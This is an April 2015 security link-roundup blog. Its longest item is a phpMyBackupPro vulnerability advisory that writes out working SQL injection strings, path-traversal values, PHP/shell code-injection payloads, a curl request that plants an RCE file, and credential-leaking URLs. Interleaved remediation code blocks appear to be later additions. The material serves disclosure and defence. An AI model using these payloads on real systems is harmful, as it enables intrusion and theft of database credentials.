Sunday, April 26, 2015

Hackers temporarily take control of Tesla’s website, Elon Musk's Twitter account

Earlier today, Tesla's Twitter account and website were taken over by some nefarious jokesters. Around 5 PM ET,  a strange tweet popped up on the company's official Twitter account, suggesting the company was no longer in control of what was being posted. The tweets largely suggested this was just an unsophisticated prank.

more here.......http://www.theverge.com/2015/4/25/8497545/teslas-twitter-hacked

Unpacking CCTV Firmware

I’ve been increasingly interested in firmware and have also stated in my previous articles that I would write an article on unpacking and hacking firmware. I thought this would be a good start. This isn’t some old firmware: the build date is February 2015 and it has some interesting features. I see a lot of people writing articles on routers and thought I’d change things up a little and look at CCTV.

Saturday, April 25, 2015

Paper: Compositional Decompilation using LLVM IR

Abstract
Decompilation or reverse compilation is the process of translating low-level
machine-readable code into high-level human-readable code. The problem is nontrivial
due to the amount of information lost during compilation, but it can be
divided into several smaller problems which may be solved independently. This
report explores the feasibility of composing a decompilation pipeline from independent
components, and the potential of exposing those components to the end-user.
The components of the decompilation pipeline are conceptually grouped into three
modules. Firstly, the front-end translates a source language (e.g. x86 assembly)
into LLVM IR; a platform-independent low-level intermediate representation. Secondly,
the middle-end structures the LLVM IR by identifying high-level control flow
primitives (e.g. pre-test loops, 2-way conditionals). Lastly, the back-end translates
the structured LLVM IR into a high-level target programming language (e.g. Go).
The control flow analysis stage of the middle-end uses subgraph isomorphism search
algorithms to locate control flow primitives in CFGs, both of which are described
using Graphviz DOT files.

Poster: Compositional Decompilation

more here........https://github.com/mewpaper/decompilation

Quagga BGP and exabgp: work together for BGP blackhole (dropping undesirable traffic) implementation

In our test case we will deploy two machines: 10.0.3.114 for exabgp (it announces a /32 prefix for blackholing on the core router side) and 10.0.3.115 (it emulates the core router). We will do this work on Debian 8 Jessie.

more here........http://www.stableit.ru/2015/04/quagga-bgp-and-exabgp-work-together-for.html

Insufficient TLS Protection in Composer (PHP)

Composer helps you declare, manage and install dependencies of PHP projects,
ensuring you have the right stack everywhere.

Pádraic Brady exclaims "this is a publicly disclosed unpatched vulnerability
on Composer's issue tracker since 2012."

The specific issue is a failure to perform TLS peer verification on remote
requests when making any API request or retrieving any file, i.e. there is a
singular client class.

more here.....https://github.com/composer/composer/issues/1074

An HTTP Status Code to Report Legal Obstacles

Abstract

   This document specifies a Hypertext Transfer Protocol (HTTP) status
   code for use when resource access is denied as a consequence of legal
   demands.

more here.........https://datatracker.ietf.org/doc/draft-ietf-httpbis-legally-restricted-status/

Malware Seen In The Middle East Region

This attack is from the same attack group as Cyber Attack 1. The attack comes as an email containing a malicious Google Docs link. It was seen around Mon 2/16/2015.

The email looks like below:

The subject translates as "Video: The Egyptian Army Conducts An Air Strike Against ISIL" and body translates as "On the dawn of Monday, the armed forces conducted a strike against some ISIL centers. The strike has met its target precisely, where ISIL camps and training places were targeted. In the video are ISIL casualties and the havoc left by the Egyptian Air Strike. Watch The Video".

more here including additional malware samples.........http://middleeastmalware.blogspot.com/2015/04/cyber-attack-10.html

OpenSSL Vs HSM Performance

Hardware Security Modules (HSMs) are basically dedicated cryptography devices, and are often one of the first links in the chain of trust in so much of what we do with technology today. They allow you to offload sometimes computationally expensive cryptographic functions like signing or encryption, and are often required in industries whose regulations require tight control of private key material (e.g. banking, certificate authorities). They also allow you to have reliable auditing capabilities and are designed to be extremely difficult to tamper with. This article does not try to sway you one way or the other in terms of using an HSM; whether or not you need an HSM is usually determined by regulation or security requirements and not performance reasons. If you are not interested in how I arrived at the numbers, click here to see the results.
Having said that, I think there are more than a few people out there that think that dedicated hardware equals better performance. This article attempts to explore this assumption of whether or not HSMs provide any performance benefit over using software, in this case OpenSSL, on commodity hardware.

Opportunity Knows No Boundary: A Case Study of Acquisition

On Monday, April 20, Raytheon and Websense announced a new venture, outlining the defense industry contractor’s planned acquisition of 80% of the internet security firm. By Thursday, April 23, an ambitious attack was unleashed and directed at Websense employees in the guise of a welcoming, if grammatically questionable, message. Emails with the subject “Welcome to join Raytheon!” were seen, containing a malicious file slyly tucked away inside a fake Kaspersky installation program.

more here.........http://community.websense.com/blogs/securitylabs/archive/2015/04/24/opportunity-knows-no-boundary-a-case-study-of-acquisition.aspx

Consideration and evaluation of using fuzzy hashing

More on Threatbutt, the new threat intelligence firm emerging out of RSA 2015- Hunt for Advanced APT with Threatbutt integration for Maltego

Maximum protection from hacker threats like 4Chan and Reddit and detailed docs on the Threatbutt API here.....https://github.com/ivanlei/threatbutt

VulnPryer- Pries more context into your vulnerability data

VulnPryer is the code behind a vulnerability reprioritization project. Using a vulnerability data feed (VulnPryer uses the VulnDB commercial project by default), VulnPryer will download that feed on an incremental basis, load the feed into MongoDB for storage, extract a mapping of features, and provide a remapping of vulnerabilities to custom severities for importing into your analysis product of choice (VulnPryer targets the RedSeal platform by default).

more here..........https://github.com/SCH-CISM/VulnPryer/blob/master/README.md


Also related, here are slides from the presentation titled "Vulnerability Management Nirvana:
A Study in Predicting Exploitability" from RSA 2015.....https://www.rsaconference.com/writable/presentations/file_upload/tech-f01_vulnerability-management-nirvana-a-study-in-predicting-exploitability.pdf

Building an Evil-AP with TL-MR3020 – Part 1 – Setup

So, recently I got my hands on a cheap TP-Link TL-MR3020 and figured I could create an Evil-AP as a project.

Flashing OpenWRT
It ships with a firmware which makes it really easy to upgrade/flash OpenWRT to it. Check this for instructions on how to do this. Once it is flashed you should log in to the web page and set a root password; once that is done you’ll be able to SSH to the device as well.

more here...........http://0xdeadcode.se/archives/407

Friday, April 24, 2015

The Pmem Memory acquisition suite

The Rekall project has maintained a set of open source memory acquisition tools for a while now. After all, memory acquisition is the first step in memory analysis. Before any analysis can be done, we need to acquire the memory in the first place. There are a number of commercial solutions to acquire memory, but sadly open source solutions have been abandoned or not maintained (for example, win32dd was a popular solution many years ago but has since been commercialized and is no longer open source).
We believe in open source forensic tools to make testing and transparency easier. We also believe that the availability of open source solutions spurs further development in the field and enables choices.
That is the reason we feel an open source, well tested and capable forensic memory acquisition tool is essential - we call it the Pmem suite of tools. The pmem acquisition tool aims to provide a complete imaging solution for Windows, Linux and OSX (OSXPmem is the only memory acquisition tool we are aware of, commercial or open source, which works on the latest version of OSX - 10.10.x).

more here.........http://rekall-forensic.blogspot.com/2015/04/the-pmem-memory-acquisition-suite.html

Google Security: A Javascript-based DDoS Attack as seen by Safe Browsing (revealing evidence of greatcannon tests from before the greatfire / github attack occurred)

To protect users from malicious content, Safe Browsing’s infrastructure analyzes web pages with web browsers running in virtual machines. This allows us to determine if a page contains malicious content, such as Javascript meant to exploit user machines. While machine learning algorithms select which web pages to inspect, we analyze millions of web pages every day and achieve good coverage of the web in general.

In the middle of March, several sources reported a large Distributed Denial-of-Service attack against the censorship monitoring organization GreatFire. Researchers have extensively analyzed this DoS attack and found it novel because it was conducted by a network operator that intercepted benign web content to inject malicious Javascript. In this particular case, Javascript and HTML resources hosted on baidu.com were replaced with Javascript that would repeatedly request resources from the attacked domains.

While Safe Browsing does not observe traffic at the network level, it affords good visibility at the HTTP protocol level. As such our infrastructure picked up this attack, too. Using Safe Browsing data, we can provide a more complete timeline of the attack and shed light on what injections occurred when.

more here......http://googleonlinesecurity.blogspot.com/2015/04/a-javascript-based-ddos-attack-as-seen.html

Sans Report on Iranian Cyber Attacks as reported by Norse and the American Enterprise Institute

On April 15, 2015 the New York Times released an article titled “Iran is Raising
Sophistication and Frequency of Cyberattacks, Study Says.”1 The article focuses
on the Iranian cyber threat as a whole but a significant portion of the article
highlighted a report by Norse, a cybersecurity intelligence company, and the
American Enterprise Institute (AEI). The article highlighted findings in an
upcoming Norse and AEI report. The report stated there were significant
increases in attacks on critical infrastructure and industrial control systems (ICS)
by the Iranian government. The report released by AEI and Norse, titled “The
Growing Cyberthreat from Iran”2 revealed claims of hundreds of thousands of
cyber attacks on worldwide infrastructure by Iran.

The purpose of this Defense Use Case (DUC) is to evaluate what can be learned
from the Norse report while also taking the opportunity to educate on what the
cyber security community would typically deem to be a cyber attack on ICS. After
reviewing the data provided in the report we agree that the data could be
interesting if put into proper context or analyzed along with additional data.
However, the data and events described in the report do not conclusively meet
the threshold of what the authors of this DUC would deem as ICS cyber attacks.

more here..........http://ics.sans.org/media/SANSICS-DUC3-Norse-Iran-Report.pdf

phpMyBackupPro Multiple Vulnerabilities

* Affected software: phpMyBackupPro
* Website: http://www.phpmybackuppro.net/

* Changelog: File doc/HISTORY.txt in the release zip file states
"03/26/2015: v.2.5:  security fixes in mutli user mode, minor bug
fixes"

* Reported by: Matthew Daley
* Timeline:
2015-03-26: Private disclosure to vendor
2015-03-27: Vendor response
2015-03-31: v2.5 released
2015-04-04: Private note to vendor that some issues (#2, #3, #4 below)
remain unfixed
2015-04-25: Public disclosure


--- Issue #1: SQL injection in multi-user mode

* Affected versions: ? -> 2.4
* Fixed version: 2.5
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/35/ (still private)

* Description:
In multi-user mode, the username and password given when a user logs
in are not escaped before interpolation into the SQL query that is used
to look up users in the database. Hence, it is vulnerable to a simple
SQL injection attack.

The injection occurs at line 70 of login.php:
$res=mysql_query("select * from user where
(User='".$_POST['username']."' or User='') and
password=password('".$_POST['password']."')");

The documentation given in documentation/MULTI_USER_MODE.txt states:
You will have to provide the MySQL root account data which are used by phpMyBackupPro to determine all available 
MySQL users.
Hence, it's highly likely that unauthenticated attackers are able to
enumerate all database entries and complete database configuration
information, such as user password hashes, using this vulnerability. A
tool such as sqlmap can be (and has been) used to do this.

It's also possible to exploit this vulnerability in order to log in as
any user given a victim's username. To do so, an attacker logs in with
the victim's username and the string "') OR 1=1-- " as password.

It's also possible to "log in" without a known username. To do so, an
attacker logs in with a username such as "../../../../../../../../tmp"
(which gets injected into the per-user configuration file path) and
the password string given above. This allows phpMyBackupPro to create
a multi-user config file in the /tmp directory regardless of how the
per-user configuration file path been configured.

In v2.5, this issue is fixed.
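As an added illustration (not phpMyBackupPro's own code), here is the line-70 lookup rewritten as a prepared statement, so the submitted username and password reach MySQL as bound parameters and the `') OR 1=1-- ` password quoted above is compared as a literal string rather than parsed as SQL. It assumes a PDO MySQL connection (the DSN and credentials are placeholders) and the same `user` table and PASSWORD() comparison the original query uses.

```php
<?php
// Added example (not phpMyBackupPro code): the Issue #1 login lookup done
// with a prepared statement instead of string interpolation.
// Assumptions: PDO MySQL driver; DSN/credentials below are placeholders.

function connect(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=PLACEHOLDER', 'PLACEHOLDER', 'PLACEHOLDER', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares: the driver never rebuilds the query
        // text from the bound values itself.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

function lookupUser(PDO $db, string $username, string $password): ?array
{
    // The original query's `OR User=''` clause is kept unchanged; only the
    // way the submitted values reach the query changes. Placeholders keep
    // the quoting rules inside the server, so a password such as
    // `') OR 1=1-- ` is simply a (wrong) password value.
    $stmt = $db->prepare(
        "SELECT * FROM user WHERE (User = :user OR User = '') AND password = PASSWORD(:pass)"
    );
    $stmt->bindValue(':user', $username, PDO::PARAM_STR);
    $stmt->bindValue(':pass', $password, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage against a live database:
// $row = lookupUser(connect(), 'victim', "') OR 1=1-- ");   // null: no such password
```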


--- Issue #2: Arbitrary code execution through user configuration variables

* Affected versions: ? -> 2.5
* Fixed version: none
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/36/ (still private)

* Description:
It's possible, once logged in to phpMyBackupPro, to execute arbitrary
PHP code. This is done by injecting it into a configuration variable
using a PHP variable variable or by breaking out of the string literal
in which the variable's value is stored in the user's configuration
file.

For example, setting a user's "delete local backups after x days"
configuration variable to the following value causes the file /tmp/xyz
to be created:
${`touch /tmp/xyz`}

The value is stored unchanged in the user's configuration file
(phpMyBackupPro_conf.php) as follows:
$CONF['del_time']=htmlspecialchars_decode("${`touch /tmp/xyz`}");

As the value is not escaped before being interpolated into the
configuration file's content, the embedded PHP code (in this case, a
single backticked shell statement) will be executed when the
configuration file is include_once'd. This includes the next loading
of any phpMyBackupPro page by that user.

(Note: Upon setting the value, the message "delete local backups after
x days' is not correct!" will be displayed; however, the setting is
still written to the user's configuration file.)

In v2.5, it is no longer possible to use PHP variable variables to
gain RCE in this way. However, it is still possible to break out of
the configuration variable's value string literal and achieve RCE in
other ways (e.g. \');`touch /tmp/xyz`;// ).


--- Issue #3: Information disclosure through get_file.php functionality

* Affected versions: ? -> 2.5
* Fixed version: none
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/37/ (still private)

* Description:
It's possible, once logged in to phpMyBackupPro, to view (among other
filetypes) the content of any .php file using the functionality
provided by the get_file.php file. This includes the content of
phpMyBackupPro's own configuration files, which contain sensitive
information such as root database credentials.

For example, after logging in, a request to get_file.php can be made
to retrieve the content of definitions.php by using the following URL:
http://[host]/phpMyBackupPro/get_file.php?view=definitions.php

This will output the content of definitions.php, including the
location of the global configuration file (as the value of the
_PMBP_GLOBAL_CONF variable). Using this information, another request
can be made, this time for this global configuration file:
http://[host]/phpMyBackupPro/get_file.php?view=/[path]/global_conf.php

This will disclose the content of the global configuration file,
including root database credentials.

In v2.5, it is no longer possible to disclose the content of
phpMyBackupPro's configuration files by using get_file.php with a
direct path reference to the configuration file in question. However,
it is still possible by using indirect path references (e.g. replacing
"../../files/global_conf.php" with
"../../files/../files/global_conf.php").
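The v2.5 fix fails because it compares path strings; the check below (an added example, not phpMyBackupPro code) instead canonicalises the requested name with realpath() and tests containment, which also covers the traversal in the Issue #1 username. The directory layout is constructed in a temp dir so the script runs stand-alone.

```php
<?php
// Added example (not phpMyBackupPro code): resolve a user-supplied file name
// against an allowed directory on the canonical path, so direct and indirect
// "../" references and absolute paths are all judged the same way.

function resolveInside(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    // realpath() folds ".", ".." and symlinks; it returns false for a file
    // that does not exist, which we treat as "not allowed".
    $target = $base === false ? false : realpath($base . '/' . $requested);
    if ($base === false || $target === false) {
        return null;
    }
    // Containment test on the canonical result: the base dir itself or
    // anything beneath it, nothing else.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed layout:  <tmp>/export/sub/dump.sql   (may be served)
//                      <tmp>/files/global_conf.php (must never be served)
$root = sys_get_temp_dir() . '/pmbp_demo_' . getmypid();
mkdir("$root/export/sub", 0700, true);
mkdir("$root/files", 0700, true);
file_put_contents("$root/export/sub/dump.sql", "-- dump\n");
file_put_contents("$root/files/global_conf.php", "<?php \$root_pw = 'secret';\n");

$requests = [
    'sub/dump.sql',                         // legitimate
    '../files/global_conf.php',             // direct reference
    '../files/../files/global_conf.php',    // indirect reference from the advisory
    'sub/../../files/global_conf.php',      // traversal via a real subdirectory
    "$root/files/global_conf.php",          // absolute path: joined under base, so not found
];
foreach ($requests as $view) {
    $r = resolveInside("$root/export", $view);
    printf("%-45s => %s\n", $view, $r === null ? 'DENIED' : 'OK ' . substr($r, strlen($root)));
}

// Clean up the constructed layout.
unlink("$root/export/sub/dump.sql");
unlink("$root/files/global_conf.php");
rmdir("$root/export/sub"); rmdir("$root/export"); rmdir("$root/files"); rmdir($root);
```

Only the first request resolves; every variant that reaches global_conf.php is denied because the canonical path lies outside the export directory.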


--- Issue #4: Arbitrary code execution through scheduled backup scripts

* Affected versions: ? -> 2.5
* Fixed version: none
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/38/ (still private)

* Description:
It's possible, once logged in to phpMyBackupPro, to execute arbitrary
PHP code. This is done by injecting it into an automatically-generated
scheduled backup script.

Many of the user-specified parameters used when generating a scheduled
backup script are not correctly escaped before being interpolated into
the script; for example, the "period" parameter.

This can be exploited e.g. using curl:
curl -b 'PHPSESSID=[session cookie]' -d 'man_dirs=x&path=[writeable
path]/&filename=rce.php&period=;echo+"<h1>RCE</h1>"'
'http://[host]/phpMyBackupPro/scheduled.php'

This will lead scheduled.php to create a scheduled backup script named
"rce.php" in the attacker-specified writable path with the following
content:
<?php
// This script was created by phpMyBackupPro v.2.4 (http://www.phpMyBackupPro.net)
// In order to work probably, it must be saved in the directory writable/.
$_POST['man_dirs']="x";
$period=(3600*24);echo "<h1>RCE</h1>";
$security_key="d06378763f9369ceea61663c33e0e8ca";
// switch to the phpMyBackupPro v.2.4 directory
@chdir("/var/www");
@include("backup.php");
// switch back to the directory containing this script
@chdir("writable/");
?>

Note that the "period" value is interpolated into the content without
being escaped. The attacker can then execute the newly-created
"rce.php", along with the injected PHP code, by making a normal HTTP
request for the file.

This obviously requires the attacker to know a web-accessible and
web-writeable directory to pass in as the "path" parameter to
scheduled.php.

In v2.5, it is no longer possible to split the "period" PHP statement
with a semicolon. However, it is possible to still inject code using
many other methods (e.g. .print("RCE") ). There are also other
injectable parameters, e.g. dirs[]=".print("RCE2")."' .
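Issues #2 and #4 share one root cause: user text is pasted into a generated PHP file as source. The added example below (not phpMyBackupPro code) writes each setting as a typed PHP literal instead, storing numeric settings such as "del_time" and "period" as validated integers and everything else through var_export(), and shows the payload strings quoted in the advisory becoming inert data.

```php
<?php
// Added example (not phpMyBackupPro code): emit user settings into a
// generated PHP file as literals, never as raw text inside a "..." string.

function configLine(string $key, string $raw): string
{
    // Settings that mean a number are stored as numbers. Anything that is
    // not a plain non-negative integer is rejected before it is written, so
    // `;echo "<h1>RCE</h1>"` never reaches the file.
    $numeric = ['del_time', 'period'];
    if (in_array($key, $numeric, true)) {
        if (!preg_match('/^\d{1,6}$/', $raw)) {
            throw new InvalidArgumentException("$key must be a small non-negative integer");
        }
        return sprintf("\$CONF[%s] = %d;\n", var_export($key, true), (int) $raw);
    }
    // var_export() yields a single-quoted PHP literal with ' and \ escaped:
    // `${...}` is not interpolated in single quotes, and `\')` cannot close
    // the literal, so both advisory payloads stay plain strings.
    return sprintf("\$CONF[%s] = %s;\n", var_export($key, true), var_export($raw, true));
}

function renderConfig(array $settings): string
{
    $out = "<?php\n// generated file; values are literals, not code\n";
    foreach ($settings as $k => $v) {
        $out .= configLine($k, (string) $v);
    }
    return $out;
}

// Constructed settings using the payloads quoted in Issues #2 and #4.
echo renderConfig([
    'del_time'    => '7',
    'backup_name' => '${`touch /tmp/xyz`}',        // Issue #2 payload, as a string setting
    'comment'     => "\\');`touch /tmp/xyz`;//",   // v2.5 bypass payload
]);
foreach (['${`touch /tmp/xyz`}', '30;echo "<h1>RCE</h1>"'] as $bad) {
    try {
        configLine('period', $bad);
    } catch (InvalidArgumentException $e) {
        echo "rejected period value: $bad\n";
    }
}
```

Checking the emitted file with `php -l` is a cheap regression test: if a setting value can ever produce a syntax error, it can also produce code.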

Announcing ShadowOS

ShadowOS is a free tool designed by Fortify on Demand to help Security and QA teams test Android applications for security vulnerabilities. It is a custom OS based on KitKat that intercepts specific areas of the device's operation and makes testing apps for security vulnerabilities easier. The OS runs as an emulator image so no hardware is required.


more here......http://h30499.www3.hp.com/t5/Fortify-Application-Security/Announcing-ShadowOS/ba-p/6725771

Pre-authentication XXE vulnerability in the Services Drupal module

From the Drupal website (https://www.drupal.org/project/services), the
Services module is:
“A standardized solution of integrating external applications with Drupal.
Service callbacks may be used with multiple interfaces like REST, XMLRPC,
JSON, JSON-RPC, SOAP, AMF, etc. This allows a Drupal site to provide
web services via multiple interfaces while using the same callback code."
The Services module can be configured to enable REST endpoints. The
REST handler can deal with JSON messages, PHP serialized objects and
also XML messages.

1.2. The issue
We discovered that the function handling XML REST requests does not
disable external entity loading when parsing XML messages sent by remote
users. If a user sends crafted XML messages referencing external resources
such as local files, the XML parser will load them during the message processing.
Using several tricks, the remote user can read local files.

In addition, we discovered that authentication and user rights are checked after
processing the message. Consequently, the vulnerability can be triggered without
being authenticated. A successful exploitation could allow anyone to read
arbitrary files on the remote file system, including the Drupal settings.php file.

more here..........http://synacktiv.ninja/ressources/synacktiv_drupal_xxe_services.pdf
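As an added example (not code from the Services module), this is how a PHP endpoint can parse an XML body so that external entities are never resolved: refuse any DOCTYPE up front, load without LIBXML_NOENT and with LIBXML_NONET, and double-check that no entities were declared. It assumes PHP 7.4+ with libxml 2.9+, where entity substitution is off unless LIBXML_NOENT is passed; older PHP additionally needed libxml_disable_entity_loader(true). The two messages are constructed.

```php
<?php
// Added example (not Drupal Services code): XXE-resistant parsing of an XML
// request body.

function parseRequestXml(string $body): DOMDocument
{
    // A legitimate REST payload carries no DTD, and an XXE needs one to
    // declare its entity, so the cheapest check is to refuse any DOCTYPE.
    if (stripos($body, '<!DOCTYPE') !== false) {
        throw new InvalidArgumentException('DTD not allowed in request body');
    }
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    // No LIBXML_NOENT (entities are not substituted) and no LIBXML_DTDLOAD;
    // LIBXML_NONET refuses any network fetch the parser might attempt.
    $ok     = $doc->loadXML($body, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new InvalidArgumentException('malformed XML: ' . trim($errors[0]->message ?? 'unknown'));
    }
    // Belt and braces: even if the DOCTYPE check were bypassed, refuse a
    // document that declares any entities at all.
    if ($doc->doctype !== null && $doc->doctype->entities->length > 0) {
        throw new InvalidArgumentException('entity declarations not allowed');
    }
    return $doc;
}

// Constructed messages: a normal node payload, and one carrying an external
// entity that points at a local file (the path is a placeholder).
$benign  = '<?xml version="1.0"?><node><title>hello</title></node>';
$crafted = '<?xml version="1.0"?>'
         . '<!DOCTYPE node [<!ENTITY x SYSTEM "file:///PLACEHOLDER/settings.php">]>'
         . '<node><title>&x;</title></node>';

echo parseRequestXml($benign)->getElementsByTagName('title')->item(0)->textContent, "\n";
try {
    parseRequestXml($crafted);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The advisory's second finding, that authentication runs after parsing, is a separate fix: the body must not be parsed at all until the caller's rights have been checked.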

TRACE A CHAIN OF DNS SERVERS BACK TO THE SOURCE

dnstracer – determines where a given Domain Name Server (DNS) gets its information from for a given hostname, and follows the chain of DNS servers back to the authoritative answer.

read more here........http://securityblog.gr/2541/trace-a-chain-of-dns-servers-back-to-the-source/

3rd German PowerShell Conference Materials & Impressions

On this page you find the materials presented at the 3rd German PowerShell Conference, Apr 21-23, 2015. The knowledge wrapped inside of them is free to anyone, and you can freely use that knowledge here......http://www.powertheshell.com/psconf2015/wpk2015materials/

Cisco releases first transparency report, showing literally nothing to hide

Networking supergiant Cisco has become the latest big firm to release a transparency report, detailing its approach to dealing with requests for information from governments and police forces, and listing how many such requests have been received and responded to.

more here........https://nakedsecurity.sophos.com/2015/04/24/cisco-releases-first-transparency-report-showing-literally-nothing-to-hide/

Paper: I Know Where You’ve Been: Geo-Inference Attacks via the Browser Cache & Video Attack Demo

Abstract—Many websites customize their services according
to different geo-locations of users, to provide
more relevant content and better responsiveness, including
Google, Craigslist, etc. Recently, mobile devices further
allow web applications to directly read users’ geo-location
information from GPS sensors. However, if such websites
leave location-sensitive content in the browser cache, other
sites can sniff users’ geo-locations by utilizing timing side channels.
In this paper, we demonstrate that such geolocation
leakage channels are widely open in popular
web applications today, including 62% of Alexa Top 100
websites. With geo-inference attacks that measure the
timing of browser cache queries, we can locate users’
countries, cities and neighborhoods in our case studies.
We also discuss whether existing defenses can effectively
prevent such attacks and additional support required for
a better defense deployment.




Covert channels – (Mis)Using ICMP protocol for file transfers with scapy

Hello w0rld. In this post I will show how it is possible to (mis)use ICMP protocol for file transfers with scapy here.....http://labs.jumpsec.com/2015/04/24/covert-channels-misusing-icmp-protocol-for-file-transfers-with-scapy/

Biometrics May Ditch The Password, But Not The Hackers

Passwords get hacked — a lot. In an effort to move beyond passwords, big companies are embracing biometric technology: the use of fingerprints, iris scans or voice recognition for user identification.

To heighten security, smartphones are being outfitted with biometric features. But, ditching passwords for biometrics may not make the hackers go away.

more here.........http://www.npr.org/blogs/alltechconsidered/2015/04/23/401466507/biometrics-may-ditch-the-password-but-not-the-hackers

SEND MESSAGE TO SKYPE CONTACT USING C#

Let’s see how can we send a message in Skype from a C# application. I chose skype just for the demonstration. You could pick any application and do anything with the following code.

more here..........http://securityblog.gr/2538/send-message-to-skype-contact-using-c/

Magento Shoplift (SUPEE-5344) Exploits in the Wild

As warned a few days ago, the Magento Shoplift (SUPEE-5344) vulnerability details have been disclosed by the CheckPoint team. They show step by step how it can be exploited to take over a vulnerable Magento site.

more here.......https://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.html

Bedep’s DGA: Trading Foreign Exchange for Malware Domains

As initially researched by Trend Micro [1] [2], Zscaler [1] [2], Cyphort, and Malware don’t need Coffee, the Bedep malware family focuses on ad / click fraud and the downloading of additional malware. ASERT’s first sample dates from September 22, 2014, which is in line with when Trend Micro started seeing it in their telemetry. In early 2015, the family got some more attention when it was being observed as the malware payload for some instances of the Angler exploit kit, leveraging the Adobe Flash Player exploit (CVE-2015-0311) which at the time was a 0day. It was also observed that this newer version was using a domain generation algorithm (DGA) to generate its command and control (C2) domain names.

This post provides some additional notes on the DGA including a proof of concept Python implementation, a look at the two most recent sets of DGA generated domains, and concludes with some sinkhole data.

more here.......http://www.arbornetworks.com/asert/2015/04/bedeps-dga-trading-foreign-exchange-for-malware-domains/

The DoD Cyber Strategy

Paper: Fast as a Shadow, Expressive as a Tree: Hybrid Memory Monitoring for C

One classical approach to ensuring memory safety of C programs is
based on storing block metadata in a tree-like datastructure. However
it becomes relatively slow when the number of memory locations
in the tree becomes high. Another solution, based on shadow
memory, allows very fast constant-time access to metadata and led
to development of several highly optimized tools for detection of
memory safety errors. However, this solution appears to be insufficient
for evaluation of complex memory-related properties of an
expressive specification language.

In this work, we address memory monitoring in the context of
runtime assertion checking of C programs annotated in E-ACSL, an
expressive specification language offered by the FRAMA-C framework
for analysis of C code. We present an original combination
of tree-based and shadow-memory-based techniques that reconciles
both the efficiency of shadow memory with the higher expressiveness
of annotations whose runtime evaluation can be ensured
by a tree of metadata. Shadow memory with its instant access
to stored metadata is used whenever small shadow metadata suffices
to evaluate required annotations, while richer metadata stored
in a compact prefix tree (Patricia trie) is used for evaluation of
more complex memory annotations supported by E-ACSL. This
combined monitoring technique has been implemented in the runtime
assertion checking tool for E-ACSL. Our initial experiments
confirm that the proposed hybrid approach leads to a significant
speedup with respect to an earlier implementation based on a Patricia
trie alone without any loss of precision.

more here.......http://kosmatov.perso.sfr.fr/nikolai/publications/jakobsson_ks_sac_2015.pdf

Cloudflare: Of Phishing Attacks and WordPress 0days

Proxying around 5% of the Internet’s requests gives us an interesting vantage point from which to observe malicious behavior. It also makes us a target. Aside from the many, varied denial of service attacks that break against our defenses we also see a huge number of phishing campaigns. In this blog post I will dissect a recent phishing attack that we detected and neutralized with the help of our friends at Bluehost.
An attack that is particularly interesting as it appears to be using a brand new WordPress 0day.

more here......https://blog.cloudflare.com/of-phishing-attacks-and-wordpress-0days/

Win32/Xswkit (alias Gootkit)

Gootkit second UAC bypass method + arbitrary dll injection reconstructed here....http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669&p=25733#p25733

Thursday, April 23, 2015

WordPress < 4.1.2 Stored XSS vulnerability

tldr; mysql → special characters → truncation → input validation → output sanitation → xss → time to update WordPress

read more here......https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

Measuring SSL Performance: RSA keys

So you're about to make an RSA key for an SSL certificate. What key size should you use?

OpenSSL now uses a 2048 bit key by default.
Windows certreq makes you explicitly specify a key size and uses 2048 bit examples in its documentation.
If you want to show the verified company name in the green bar in a browser, you'll need an EV certificate, which requires a 2048 bit RSA key at minimum.

more here.......https://certsimple.com/blog/measuring-ssl-rsa-keys

4k ULTRA HIGH DEFINITION Satellite Security Research - DVB-S2X Security Evaluation Draft Notes

Author: Nicholas Lemonias

Advisory Date: 23/4/2015

 4k Satellite Security Research - DVB-S2X Standard Evaluation Notes


#             .       .                   .       .      .     .      .
#            .    .         .    .            .     ______
#        .           .             .               ////////
#                  .    .   ________   .  .      /////////     .    .
#             .            |.____.  /\        ./////////    .
#      .                 .//      \/  |\     /////////
#         .       .    .//          \ |  \ /////////       .     .   .
#                      ||.    .    .| |  ///////// .     .
#       .    .         ||           | |//`,/////                .
#               .       \\        ./ //  /  \/   .
#    .                    \\.___./ //\` '   ,_\     .     .
#            .           .     \ //////\ , /   \                 .    .
#                         .    ///////// \|  '  |    .
#        .        .          ///////// .   \ _ /          .
#                          /////////                              .
#                   .   ./////////     .     .
#           .           --------   .                  ..             .
#   .               .        .         .                       .
#                          ________________________
#  ____________------------                        -------------_________


                -=[ Advanced Information Security Corporation ]=-


 Abstract
 ==========
During a security evaluation of Digital Video Broadcasting for
Satellite - S2X (Extended) for UHD/4K-compatible ecosystems, conducted
internally by the Advanced Information Security Group, instances of
insecure function use were observed which could lead to exploitation
of these systems.

 Introduction
 ==========
Ultra High Definition is rapidly growing into the next revolution of
virtual reality, beyond HDTV. Ultra HD aims to deliver a surreal
cinematic experience to the next generation of broadcasting. Ultra High
Definition is a digital format that can process and deliver 4K and 8K
pixel resolution data.

Encoding operates at frame rates of up to 60 fps. The higher the frame
rate, the higher the demands on data transfer technology.

High-bandwidth content utilizes hybrid architectures and makes use of
fiber optic technologies, cable networks, wireless architectures and
high-powered DTH satellite broadcasting systems. DTH satellites
operate at higher frequencies, mostly in the Ka band or higher.

The Japanese Government was one of the first to implement the UHD 4K
system over satellite in practice. In their experiment, prominent
environmental predicaments (rain attenuation issues) led to
modifications of the modulation methods. It is pertinent to note,
however, that no security considerations were mentioned in their
experiment.

During an internal security evaluation of the extended version
